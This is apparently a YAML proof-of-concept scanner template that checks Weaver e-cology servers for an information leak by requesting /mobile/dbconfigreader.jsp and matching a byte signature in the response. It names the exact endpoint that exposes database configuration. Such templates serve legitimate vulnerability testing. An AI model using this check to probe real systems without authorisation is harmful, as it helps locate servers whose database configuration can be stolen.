name: poc-yaml-weaver-e-cology-dbconfigreader-jsp-info-leak
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /mobile/dbconfigreader.jsp
            follow_redirects: false
        expression: response.status == 200 && response.content_type.icontains("text/html") && response.body.bcontains(b"\x8a\xd2\xf1\xd4\x98~p\x05Sn")
expression: r0()
detail:
    author: socat
    links:
        - https://mp.weixin.qq.com/s/zTEUan_BtDDzuHzmd9pxYg
    vulnerability:
        id: CT-490564
        level: high
